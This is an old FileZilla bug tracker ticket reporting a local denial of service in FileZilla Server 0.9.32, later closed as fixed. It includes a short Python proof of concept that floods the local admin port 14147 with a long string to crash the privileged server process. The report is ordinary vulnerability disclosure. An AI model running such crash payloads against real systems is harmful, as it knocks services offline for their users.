Opened 15 years ago
Closed 12 years ago
#4693 closed Bug report (fixed)
FileZilla Server version 0.9.32 local denial of service
| Reported by: | Juan Pablo Lopez Yacubian | Owned by: | |
|---|---|---|---|
| Priority: | critical | Component: | FileZilla Server |
| Keywords: | crash, admin, 14147, fixed | Cc: | |
| Component version: | Operating system type: | Windows | |
| Operating system version: | XP SP3 |
Description
Hello people
The problem is in a local port (14147) that "filezilla server" used for its interface.
If you send some data to this port, that is open in "FileZilla Server Interface.exe", the process "FileZilla server.exe" crash.
I did some test with a debugger and i could not run code.. for me is only a denial of service, but is important repair it becuase this process run with the system privileges.
i wrote a poc in python for test
from socket import * host = "127.0.0.1" port = 14147 data = "A" * 698000 s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(data) s.close()
OS : Windows Xp SP3 - all patch
see you
Juan Pablo Lopez Yacubian
Attachments (1)
Change History (3)
by , 15 years ago
| Attachment: | FileZilla Server.7z added |
|---|
comment:1 by , 15 years ago
| Priority: | low → critical |
|---|---|
| Status: | new → moreinfo |
comment:2 by , 12 years ago
| Keywords: | crash admin 14147 fixed added |
|---|---|
| Resolution: | → fixed |
| Status: | moreinfo → closed |
This is 3 years old, and a fix was released.
If this problem still occurs on current FzServer, please reopen this ticket.
Note:
See TracTickets
for help on using tickets.
Thanks for spotting this.
Please try the attached build of FileZilla Server.